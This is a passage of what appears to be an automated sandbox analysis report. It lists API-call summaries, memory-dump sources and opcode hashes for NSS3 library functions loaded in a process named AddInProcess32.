                                                                                      • PR_CallOnce.NSS3(6CD89C38,6CD1CC87,00000000,00000000,00000000,?,6CCE328A,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000), ref: 6CD1C9E4
                                                                                      • PL_FreeArenaPool.NSS3(?,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1C9F6
                                                                                      • PORT_ZFree_Util.NSS3(?,0000001C,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216), ref: 6CD1CA05
                                                                                      • PR_Unlock.NSS3(00000000,00000000,00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?), ref: 6CD1CA11
                                                                                      • PR_DestroyLock.NSS3(00000000,?,00000000,?,?,6CCDCC16,00000000,?,?,?,?,?,6CCDC216,?,?), ref: 6CD1CA18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArenaLockPool$CallClearDestroyFreeFree_OnceUnlockUtil
                                                                                      • String ID:
                                                                                      • API String ID: 3237444166-0
                                                                                      • Opcode ID: f8b323e07af18715569a07187b8cd296e94d2e8a778c1bde57ce0cd4834f0be7
                                                                                      • Instruction ID: f74c78ee79ce39d621990c56eca422370e926d7883e2e6bba10065b8ac4d6d50
                                                                                      • Opcode Fuzzy Hash: f8b323e07af18715569a07187b8cd296e94d2e8a778c1bde57ce0cd4834f0be7
                                                                                      • Instruction Fuzzy Hash: A601283314D614EEF7112764B885BAA33ECDBC2B79F34001BF24605C905F35A8418675
                                                                                      APIs
                                                                                        • Part of subcall function 6CD46AC0: PR_GetIdentitiesLayer.NSS3(?,?,6CD2E3A3,?), ref: 6CD46ACC
                                                                                        • Part of subcall function 6CD46AC0: PORT_SetError_Util.NSS3(FFFFE891,?), ref: 6CD46ADF
                                                                                      • CERT_NewCertList.NSS3 ref: 6CD3E9F3
                                                                                        • Part of subcall function 6CCDE415: PORT_NewArena_Util.NSS3(00000800), ref: 6CCDE41B
                                                                                        • Part of subcall function 6CCDE415: PORT_ArenaZAlloc_Util.NSS3(00000000,0000000C), ref: 6CCDE42A
                                                                                        • Part of subcall function 6CCDE415: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CCDE437
                                                                                      • CERT_DupCertificate.NSS3(?), ref: 6CD3EA01
                                                                                      • CERT_AddCertToListTail.NSS3(00000000,00000000,?), ref: 6CD3EA08
                                                                                      • CERT_DupCertificate.NSS3(?), ref: 6CD3EA1F
                                                                                      • CERT_AddCertToListTail.NSS3(00000000,00000000,?), ref: 6CD3EA26
                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6CD3EA3D
                                                                                      • PORT_SetError_Util.NSS3(FFFFD003), ref: 6CD3EA49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$CertList$Arena_CertificateError_Tail$Alloc_ArenaDestroyFreeIdentitiesLayer
                                                                                      • String ID:
                                                                                      • API String ID: 359546950-0
                                                                                      • Opcode ID: 496b980db2bff5ee38cd56aecf485dfda103c981f1c3a8feb4bdfae4f397198c
                                                                                      • Instruction ID: 3ffc6a8ced536c0e8d172922e0e8f4226493075a036a5ac82c841de9ef10b5c3
                                                                                      • Opcode Fuzzy Hash: 496b980db2bff5ee38cd56aecf485dfda103c981f1c3a8feb4bdfae4f397198c
                                                                                      • Instruction Fuzzy Hash: 3401AC31544620A6D6225B558C80B6B36A86F4366CF192538DD8CA6FB4FB21EC45C9F1
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCD4CA5
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD4CBA
                                                                                      • PR_Lock.NSS3 ref: 6CCD4CCD
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • getprotobyname.WSOCK32(?), ref: 6CCD4CD6
                                                                                      • GetLastError.KERNEL32(?), ref: 6CCD4CE2
                                                                                      • PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CCD4D10
                                                                                      • PR_Unlock.NSS3 ref: 6CCD4D1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CriticalEnterInitLastLockSectionUnlockgetprotobyname
                                                                                      • String ID:
                                                                                      • API String ID: 1336326941-0
                                                                                      • Opcode ID: 99860320c5cff5402ed81a127d1b6017d9a17c82921baeaeff9d7284a71de591
                                                                                      • Instruction ID: d4ad6cea24a6c140d671449419f28e0f1a059b71cde9049998fc33aec81495c4
                                                                                      • Opcode Fuzzy Hash: 99860320c5cff5402ed81a127d1b6017d9a17c82921baeaeff9d7284a71de591
                                                                                      • Instruction Fuzzy Hash: 3701F732515100BAEF006FA8EC01BDA3764AB42738F350351FB3955AE0EB717450C694
                                                                                      APIs
                                                                                      • PR_Init.NSS3 ref: 6CCD4D34
                                                                                      • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CCD4D49
                                                                                      • PR_Lock.NSS3 ref: 6CCD4D5C
                                                                                        • Part of subcall function 6CCD98BD: EnterCriticalSection.KERNEL32(?,774CDF20,00000000,?,6CCD9FF0,?,?,?,?,?,?,?,6CCC7CFB,00000000,?,6CCD411D), ref: 6CCD98D0
                                                                                      • getprotobynumber.WSOCK32(?), ref: 6CCD4D65
                                                                                      • GetLastError.KERNEL32(?), ref: 6CCD4D71
                                                                                      • PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CCD4D9F
                                                                                      • PR_Unlock.NSS3 ref: 6CCD4DAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$CriticalEnterInitLastLockSectionUnlockgetprotobynumber
                                                                                      • String ID:
                                                                                      • API String ID: 3567842164-0
                                                                                      • Opcode ID: 25fcf910d44ce97e78b988adee3579ce5114cd8a0fed7562cbaf640aad69abbc
                                                                                      • Instruction ID: 1f5b6e02f532b50281429ec3541dd83851531f30f634dec19b100452911dc13a
                                                                                      • Opcode Fuzzy Hash: 25fcf910d44ce97e78b988adee3579ce5114cd8a0fed7562cbaf640aad69abbc
                                                                                      • Instruction Fuzzy Hash: 27012632119110BAEF006FA8EC05BCA3769AB0273CF2A0395FB3955AE0FF716490C694
                                                                                      APIs
                                                                                      • SECKEY_CopyPublicKey.NSS3(00000000,00000000,?,6CD43D72,FFFFE013,?,00000000,00000000), ref: 6CD43FD8
                                                                                        • Part of subcall function 6CCEB0A2: PORT_NewArena_Util.NSS3(00000800,6CCE6283,?,6CCEDA27,?,6CCE6283,?,6CCE628F,?,6CCEDB0C,6CCE628F,?,?,00000000,00000000,6CCED42E), ref: 6CCEB0AB
                                                                                        • Part of subcall function 6CCEB0A2: PORT_SetError_Util.NSS3(FFFFE013,6CCE6283,?,6CCEDA27,?,6CCE6283,?,6CCE628F,?,6CCEDB0C,6CCE628F,?,?,00000000,00000000,6CCED42E), ref: 6CCEB0BC
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,?,6CD43D72,FFFFE013,?,00000000,00000000), ref: 6CD43FE9
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • SECKEY_CopyPrivateKey.NSS3(?,00000000,00000000,?,6CD43D72,FFFFE013,?,00000000,00000000), ref: 6CD43FF8
                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,00000000,00000000,?,6CD43D72,FFFFE013,?,00000000,00000000), ref: 6CD44005
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,00000000,00000000,00000000,?,6CD43D72,FFFFE013,?,00000000,00000000), ref: 6CD4400F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$Error_$CopyPublic$Arena_DestroyErrorPrivate
                                                                                      • String ID:
                                                                                      • API String ID: 487096992-0
                                                                                      • Opcode ID: 6a4b88ee0575e6703484ebfaee42fc42b4bb532e3f23053070d750e2da379ab1
                                                                                      • Instruction ID: 32d0b62f1b939edc572a345c513e8c8bdc54562aa4a4e88caab3d03676aa7241
                                                                                      • Opcode Fuzzy Hash: 6a4b88ee0575e6703484ebfaee42fc42b4bb532e3f23053070d750e2da379ab1
                                                                                      • Instruction Fuzzy Hash: B6F0A93251A6109FEF125FB9DC044493BBCEF87375310422AF71896AF0DF3554159A54
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: __cftof
                                                                                      • String ID:
                                                                                      • API String ID: 1622813385-0
                                                                                      • Opcode ID: 9539f78bc96eac7a967553ccb0c301776ffd4831bd9bda9a06b43303d5572ab7
                                                                                      • Instruction ID: e00332604999f4e449fe0ef46280f87b817f7319bc148fd6073af5f9aef06e63
                                                                                      • Opcode Fuzzy Hash: 9539f78bc96eac7a967553ccb0c301776ffd4831bd9bda9a06b43303d5572ab7
                                                                                      • Instruction Fuzzy Hash: D5B19E31D0220ABFCF05DFA8CC49EEEBBB5FF09308F108019E515A6650E7369A51DBA4
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CD0EA15
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6CD0EB57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: DoesErrorError_K11_MechanismUtil
                                                                                      • String ID:
                                                                                      • API String ID: 317499321-0
                                                                                      • Opcode ID: 714ce6aa70496ad2b1a4ead17038451cf4d0ab244b4c0526fe53f6a249090348
                                                                                      • Instruction ID: 72f651099f05b2ee4354473325afe0a6ada72ba2b3eea22458dd2bc367a26e3c
                                                                                      • Opcode Fuzzy Hash: 714ce6aa70496ad2b1a4ead17038451cf4d0ab244b4c0526fe53f6a249090348
                                                                                      • Instruction Fuzzy Hash: 38A17171E0021ADBDB25CF28CD81BDAB7F4AF49314F1041A9E989A7B50E7719E84CF90
                                                                                      APIs
                                                                                      • sqlite3_column_blob.NSS3(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,6CC7BB9B,?,?,?), ref: 6CC7DD62
                                                                                        • Part of subcall function 6CC66129: sqlite3_value_blob.NSS3(00000000,?,?), ref: 6CC66139
                                                                                      • sqlite3_reset.NSS3(?,?,00000000,?,00000000,?,?,?,?,?,?,6CC7BB9B,?,?,?,?), ref: 6CC7DD9F
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC7DDFB
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC7DE2C
                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,?,00000000,?,00000000,?,?,?,?,?,?,6CC7BB9B,?), ref: 6CC7DF1E
                                                                                        • Part of subcall function 6CC9D6AB: sqlite3_bind_int64.NSS3(00000000,00000001,00000000,?,?,00000000,?), ref: 6CC9D6D9
                                                                                        • Part of subcall function 6CC9D6AB: sqlite3_step.NSS3(00000000,00000000,00000001,00000000,?,?,00000000,?), ref: 6CC9D6DF
                                                                                        • Part of subcall function 6CC9D6AB: sqlite3_column_type.NSS3(00000000,00000000,?,?,?,?,?,?,00000000,?), ref: 6CC9D6EF
                                                                                      • sqlite3_reset.NSS3(?,00000000,?,00000000,?,?,?,?,?,?,6CC7BB9B,?,?,?,?), ref: 6CC7DF87
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@sqlite3_reset$memsetsqlite3_bind_int64sqlite3_column_blobsqlite3_column_typesqlite3_stepsqlite3_value_blob
                                                                                      • String ID:
                                                                                      • API String ID: 625624619-0
                                                                                      • Opcode ID: b88254588296644fc558f479f256350c29c68c84b918d14191cdf73c8ee977a9
                                                                                      • Instruction ID: ae122ff140f6dd3690406dbd6bc9ed38d88a5dc871316438cb8c0c8bb59f7b8e
                                                                                      • Opcode Fuzzy Hash: b88254588296644fc558f479f256350c29c68c84b918d14191cdf73c8ee977a9
                                                                                      • Instruction Fuzzy Hash: E9818172901209AFCB21CFA5CD80AEFBBB9EF45314F24455AE925A7A10F731D945CB70
                                                                                      APIs
                                                                                      • CERT_FindCertExtension.NSS3(00000000,0000005C,?,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCDE919
                                                                                      • CERT_DecodeOidSequence.NSS3(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,6CCF51BE), ref: 6CCDE929
                                                                                        • Part of subcall function 6CCE2AB2: PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2ABF
                                                                                        • Part of subcall function 6CCE2AB2: PORT_ArenaZAlloc_Util.NSS3(00000000,00000008,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2ACE
                                                                                        • Part of subcall function 6CCE2AB2: SECITEM_CopyItem_Util.NSS3(00000000,?,6CCDE92E,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2AE5
                                                                                        • Part of subcall function 6CCE2AB2: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CD5FC68,?,?,00000000,00000000,?,6CCDE92E,?,?,?,?,00000000,?), ref: 6CCE2AFC
                                                                                      • CERT_IsCACert.NSS3(00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 6CCDE95B
                                                                                      • PORT_Free_Util.NSS3(?,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CCDE992
                                                                                      • PORT_Free_Util.NSS3(00000000,?,?,?,00000000,?), ref: 6CCDEAA3
                                                                                      • CERT_DestroyUserNotice.NSS3(00000000,?,?,?,00000000,?), ref: 6CCDEAAE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$CertDecodeFree_Item_$Alloc_ArenaArena_CopyDestroyExtensionFindNoticeQuickSequenceUser
                                                                                      • String ID:
                                                                                      • API String ID: 1810482800-0
                                                                                      • Opcode ID: 4480ae933096a4261652903731fbb5e64bc677c8aedcd4668e9fb1ecf3b4b4d3
                                                                                      • Instruction ID: 0101ce0899489d1d3ba8afa4ae291d86204fdb09c65d4261ac9b4a8909f43769
                                                                                      • Opcode Fuzzy Hash: 4480ae933096a4261652903731fbb5e64bc677c8aedcd4668e9fb1ecf3b4b4d3
                                                                                      • Instruction Fuzzy Hash: CE511A32D097175DF71085A6D8807DEBBA8BB03328F12016FDB08A59C0FB64F684C5D5
                                                                                      APIs
                                                                                      • ___swprintf_l.LIBCMT(0000000D,?,-mj%06X9%02X,?,00000000,00000004,?,?,?,00000000,6CC62303,00000001), ref: 6CCBAABD
                                                                                        • Part of subcall function 6CCB4F46: sqlite3_free.NSS3(33C774FF,?,33C774FF,00000000,?,?), ref: 6CCB4F7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_lsqlite3_free
                                                                                      • String ID: %s-mjXXXXXX9XXz$-mj%06X9%02X$MJ collide: %s$MJ delete: %s
                                                                                      • API String ID: 553946722-4034981963
                                                                                      • Opcode ID: 6cfeffbe5d7cede27369c1b9cb0a7aafd1fe562f3d78627266193ad52d0e44b0
                                                                                      • Instruction ID: 877b17520cbd8d99ac057b064ad4cdf63f1acd49b9e373abbe0e63faf72a1fa9
                                                                                      • Opcode Fuzzy Hash: 6cfeffbe5d7cede27369c1b9cb0a7aafd1fe562f3d78627266193ad52d0e44b0
                                                                                      • Instruction Fuzzy Hash: 32E19075E00215AFDF04CFA9C884A9E7BB5EF88714F248159E858EBB41FB31D9418BA0
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005), ref: 6CCE1D4F
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • CERT_CopyName.NSS3(?,00000004,?), ref: 6CCE1D84
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,0000001C,?), ref: 6CCE1D9D
                                                                                      • CERT_GetCommonName.NSS3(?), ref: 6CCE1DF4
                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000004,00000000), ref: 6CCE1E38
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyUtil$Item_Name$CommonErrorError_
                                                                                      • String ID:
                                                                                      • API String ID: 510239352-0
                                                                                      • Opcode ID: 142dd9ee669ccde6b2cd2383804b09f90bd466a1c7ed026bede5b4a4946f4cd6
                                                                                      • Instruction ID: bbcf63bd47b1b0d1bf378f1ea622c163cf4d82d3029ab26a1217b3942b9785b6
                                                                                      • Opcode Fuzzy Hash: 142dd9ee669ccde6b2cd2383804b09f90bd466a1c7ed026bede5b4a4946f4cd6
                                                                                      • Instruction Fuzzy Hash: 49310BB29046066EEB059F699C44AAB77BCEF46318F14412AF80497A41FB30DE198760
                                                                                      APIs
                                                                                      • PORT_SetError_Util.NSS3(FFFFE005,00000000,?,?,6CCFED55,00000001,6CCF8538,6CD10A0D), ref: 6CD0FC35
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE040,00000000,?,00000000,?,?,6CCFED55,00000001,6CCF8538,6CD10A0D), ref: 6CD0FC6C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error_Util$Error
                                                                                      • String ID:
                                                                                      • API String ID: 2687509522-0
                                                                                      • Opcode ID: 17f3a7b1cefe34f95aac95aadf19491465420befd141910bfe8f1d4d74908fd9
                                                                                      • Instruction ID: 6ef96e8bdd2b1f968a74fcb473710b93f52f62229bebf7820427ab339f347a51
                                                                                      • Opcode Fuzzy Hash: 17f3a7b1cefe34f95aac95aadf19491465420befd141910bfe8f1d4d74908fd9
                                                                                      • Instruction Fuzzy Hash: 4B41A671A04205EBDB00DFA8DD80AEE77B8FF44318F244559EC14A3B60D734DA55CBA5
                                                                                      APIs
                                                                                      • PR_Lock.NSS3(?,00000000,?,00000000,?,6CCFCA7C,?,00000000,?), ref: 6CCF6FD6
                                                                                        • Part of subcall function 6CCEF761: PR_Lock.NSS3(?,?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF76C
                                                                                        • Part of subcall function 6CCEF761: PL_HashTableLookup.NSS3(?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF778
                                                                                        • Part of subcall function 6CCEF761: PR_Unlock.NSS3(?,?,00000000,?,6CCF72EA,?,00000000,?,?,00000000,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEF782
                                                                                      • PR_Now.NSS3(?,00000000,?), ref: 6CCF6FFA
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCF7024
                                                                                        • Part of subcall function 6CCEFC5D: PR_DestroyLock.NSS3(70FF5073,00000000,?,6CCF7562,00000000,?,00000000,?,00000000,?,6CCF36FF,00000000,?,00000000), ref: 6CCEFC81
                                                                                      • PR_Unlock.NSS3(?), ref: 6CCF704F
                                                                                      • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CCF708D
                                                                                      • sqlite3_db_mutex.NSS3(00000000), ref: 6CCF709E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unlock$Lock$DestroyHashLookupTablesqlite3_db_mutex
                                                                                      • String ID:
                                                                                      • API String ID: 3125267424-0
                                                                                      • Opcode ID: 905ad352a6d634e2d0f1e42fa556633f8f325fc062d04e895ef2971bf83376e2
                                                                                      • Instruction ID: 676a407e920584552b7079362b6593bfdbe894fdd00ebe3730a3e0df69325c25
